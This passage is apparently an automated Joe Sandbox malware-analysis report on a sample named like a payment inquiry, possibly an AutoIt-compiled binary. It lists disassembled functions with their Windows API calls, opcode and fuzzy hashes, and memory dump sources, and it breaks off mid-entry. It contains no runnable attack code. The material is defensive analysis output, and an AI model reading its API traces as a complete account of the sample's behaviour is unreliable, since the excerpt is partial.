                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: cb459971ebcb7cf0bd61994c23f5e4ecec04fd290859cedf36b51350d8e818f0
                                          • Instruction ID: 9cf1a376e0db11db0aec972c1b351a86fc4dbdcae0126a3a885d20fe13ff5475
                                          • Opcode Fuzzy Hash: cb459971ebcb7cf0bd61994c23f5e4ecec04fd290859cedf36b51350d8e818f0
                                          • Instruction Fuzzy Hash: 1A31C07160021DEFDB14CFA8EA4CA9E7BB6EB04325F104229F925E61D1C7B09958DB91
                                          Function 00E4B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00E4B6C7
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E4B6E4
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E4B71C
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E4B742
                                          • _wcsstr.LIBCMT ref: 00E4B74C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: ac7bd1de5972f2a528eed902406925616407427db908dc20e6f57528652d985d
                                          • Instruction ID: 87621064bd83b9130c6fc733514ec77057091bce4cb5fea1b4f0ef6894d8d6be
                                          • Opcode Fuzzy Hash: ac7bd1de5972f2a528eed902406925616407427db908dc20e6f57528652d985d
                                          • Instruction Fuzzy Hash: E521FC31604204BBEB159B79AC49EBB7B9CDF89760F00517AFD09EA161EF61DC8096A0
                                          Function 00E7B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7B44C
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E7B471
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E7B489
                                          • GetSystemMetrics.USER32(00000004), ref: 00E7B4B2
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E61184,00000000), ref: 00E7B4D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: 428497639dc46d312cf6620b4d89f0a375f0ac7882c453bfe299c657fe346d13
                                          • Instruction ID: f57abab2b36976b4c8b1331356b0aff7946f36659a2d72d1d073a2d5209b8cf2
                                          • Opcode Fuzzy Hash: 428497639dc46d312cf6620b4d89f0a375f0ac7882c453bfe299c657fe346d13
                                          • Instruction Fuzzy Hash: 0D217C31910265AFCB248F39CC04BAA3BA4FB05725F149738F93AE31E1F73098509B90
                                          Function 00E497E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E49802
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E49834
                                          • __itow.LIBCMT ref: 00E4984C
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E49874
                                          • __itow.LIBCMT ref: 00E49885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 8f094a00ba2a53c6eb6c1853d14ab6641f2aaa50f6599a29c0c5c21dac5d9531
                                          • Instruction ID: 51d04dcec39833739141f7fc4d9cd850ea7cc5db1378e08a711cfeadb5e5f718
                                          • Opcode Fuzzy Hash: 8f094a00ba2a53c6eb6c1853d14ab6641f2aaa50f6599a29c0c5c21dac5d9531
                                          • Instruction Fuzzy Hash: 8221CB31700208ABDB149A759C86EEF7BA8EF4E714F045025FE05FB252D6708D4597E1
                                          Function 00DF12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                          • SelectObject.GDI32(?,00000000), ref: 00DF135C
                                          • BeginPath.GDI32(?), ref: 00DF1373
                                          • SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: f7fa7d4f0dac382b73ff39caa1fbd6bea1dc1ae9913a15a836e94054e44cb777
                                          • Instruction ID: 782dfd72cdf121728e916aebe7cc64e0526e0445255b22e2b4570bea2815fa53
                                          • Opcode Fuzzy Hash: f7fa7d4f0dac382b73ff39caa1fbd6bea1dc1ae9913a15a836e94054e44cb777
                                          • Instruction Fuzzy Hash: F9217175800208EFDB159F66EC0577A7BF8FB00321F15C32AF918BA5A0D3759999DBA0
                                          Function 00E4C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: e9d35c1a8c6d1b9336456ce3d2bdfdc9304ac7936c6333f25fe87945141b2386
                                          • Instruction ID: 6e471e6511c3ea2b0169c6852250b232583d2f7866c3b42452fb6063d219a4ad
                                          • Opcode Fuzzy Hash: e9d35c1a8c6d1b9336456ce3d2bdfdc9304ac7936c6333f25fe87945141b2386
                                          • Instruction Fuzzy Hash: 9B0192B1A072057BE204B6206C42FFB67AC9B21398F646065FE08B7383E651AE1182A0
                                          Function 00E54D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E54D5C
                                          • __beginthreadex.LIBCMT ref: 00E54D7A
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00E54D8F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E54DA5
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E54DAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 7afc22e6859de841a9eb8d82a5674ec0cb1f0c51702f4239278ae70926b92457
                                          • Instruction ID: 13e1a5d78fdb88935fa70c55bd73e6a948588a10b06ffa8fabda53e4de329d62
                                          • Opcode Fuzzy Hash: 7afc22e6859de841a9eb8d82a5674ec0cb1f0c51702f4239278ae70926b92457
                                          • Instruction Fuzzy Hash: A81108B6904204BFD701DBA99C04ADB7FBCEB45325F144365FD18F32A1D6758D888BA0
                                          Function 00E4874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
                                          • GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
                                          • HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 228453688b3a1b39268850aab43e07f7e13effb11505f614a7e1a5cc855128fe
                                          • Instruction ID: fdd178b1d10025a3b262bb2a4b6ff4c69a80bde23623734989a347354e404961
                                          • Opcode Fuzzy Hash: 228453688b3a1b39268850aab43e07f7e13effb11505f614a7e1a5cc855128fe
                                          • Instruction Fuzzy Hash: 15016271605204FFDB108FA6ED4CD6B7B6CFF85355B200439F849E2160DA318C44CA70
                                          Function 00E554E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E55502
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E55510
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E55518
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E55522
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E5555E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 2d4ec9626897b1121ab21856115a5dddbadc2af4e591dc849022b06e98e37715
                                          • Instruction ID: a3b5bd5cfd1b295087d29dff22719aff81a79cb059f04b4d37fb302a683d15de
                                          • Opcode Fuzzy Hash: 2d4ec9626897b1121ab21856115a5dddbadc2af4e591dc849022b06e98e37715
                                          • Instruction Fuzzy Hash: 50016D32C01A29DBCF00DFE9E8589EDBB79FF09712F400856E805B2141EB305598C7A1
                                          Function 00E485F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E48608
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E48612
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E48621
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E48628
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E4863E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 7c450b82d2ac61d44a5146c4dafa74afca696b3d2713e94944a0e9b67c945d20
                                          • Instruction ID: 7b2014225e0a25635cf2b8a17e5e35a6b4f8adb3fe032ad51dac63757ac3afa5
                                          • Opcode Fuzzy Hash: 7c450b82d2ac61d44a5146c4dafa74afca696b3d2713e94944a0e9b67c945d20
                                          • Instruction Fuzzy Hash: 5DF04F31201204AFEB104FA6ED89E6F3BACFF89B58F401465F949E6150CB61DC85DA60
                                          Function 00E48652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E48669
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E48673
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48682
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48689
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E4869F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 612ae972330f256a09be995423ae3f81612bd5c468215a415b43ae4fc9151836
                                          • Instruction ID: bb8c33f54bfea5e818747795142d11e887b0be347ab46d8e6fce74fd5c595718
                                          • Opcode Fuzzy Hash: 612ae972330f256a09be995423ae3f81612bd5c468215a415b43ae4fc9151836
                                          • Instruction Fuzzy Hash: DBF04F71201204AFEB115FA6EC88E6B3BACFF8A758F100075F949E6150CA61D985DA60
                                          Function 00E4C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C6BA
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E4C6D1
                                          • MessageBeep.USER32(00000000), ref: 00E4C6E9
                                          • KillTimer.USER32(?,0000040A), ref: 00E4C705
                                          • EndDialog.USER32(?,00000001), ref: 00E4C71F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 43bfb8244fd1232b6ce932f529dee46501b30e338b6948dfa67a3db8ed5b8e92
                                          • Instruction ID: 1d65fdd916a0aae92951a8bd871ddaa91e680bfa6af51eac2324d3f14ae11dc1
                                          • Opcode Fuzzy Hash: 43bfb8244fd1232b6ce932f529dee46501b30e338b6948dfa67a3db8ed5b8e92
                                          • Instruction Fuzzy Hash: 9F01D630400304ABEB209F61EC4EFA677B8FF04B05F10166AF546B20E0DBF0A9988F90
                                          Function 00DF13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • EndPath.GDI32(?), ref: 00DF13BF
                                          • StrokeAndFillPath.GDI32(?,?,00E2BAD8,00000000,?), ref: 00DF13DB
                                          • SelectObject.GDI32(?,00000000), ref: 00DF13EE
                                          • DeleteObject.GDI32 ref: 00DF1401
                                          • StrokePath.GDI32(?), ref: 00DF141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 5335f806b4642e7067a693ce56d16885addeaf3c14e08603df3975c884e56ab9
                                          • Instruction ID: f3118281d08135398c7378ef4340fe0188d9bb1ff5f7e56b51ea5e06756b1e9f
                                          • Opcode Fuzzy Hash: 5335f806b4642e7067a693ce56d16885addeaf3c14e08603df3975c884e56ab9
                                          • Instruction Fuzzy Hash: 5CF0B235004208EFDB1A9FA7EC087693BA5AB41326F08C324E569A91B1C7398999DF60
                                          Function 00E5C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E5C69D
                                          • CoCreateInstance.OLE32(00E82D6C,00000000,00000001,00E82BDC,?), ref: 00E5C6B5
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • CoUninitialize.OLE32 ref: 00E5C922
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: b27b2731188805f28b977c76f715c71e866b107ee3f078722d3b2668d9b0aa29
                                          • Instruction ID: 0cde4da9f395eaa5e35847cb980676bb3dac271598554cf522711bb9081a9643
                                          • Opcode Fuzzy Hash: b27b2731188805f28b977c76f715c71e866b107ee3f078722d3b2668d9b0aa29
                                          • Instruction Fuzzy Hash: EAA13B71508305AFD300EF54C891EABB7E8EF94704F00891CF696971A2DB70EA49CB72
                                          Function 00E02E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00DF7BB1: _memmove.LIBCMT ref: 00DF7C0B
                                          • __swprintf.LIBCMT ref: 00E0302D
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E02EC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 73b4e2412b7f0d60f60da796715e3411803eb3b87353e8000de49e9a92834153
                                          • Instruction ID: ce71dd710666b1859a6f288cdbb9095f08f0b1efefcf0ed1683b88309fb33857
                                          • Opcode Fuzzy Hash: 73b4e2412b7f0d60f60da796715e3411803eb3b87353e8000de49e9a92834153
                                          • Instruction Fuzzy Hash: 7B918E71608305AFC718EF24D885CBFBBE8EF85744F01991DF555A72A1DA20EE84CB62
                                          Function 00E4B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00E4B981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%
                                          • API String ID: 3565006973-1286912533
                                          • Opcode ID: 2616f31a8774602fa337d45a3976a3b0816a6b278824f3d9de44ca6d16e0ef78
                                          • Instruction ID: 2627eb47506942e9002080e3b261643a1c4e4d1b7a3abaf870598f79aff837ed
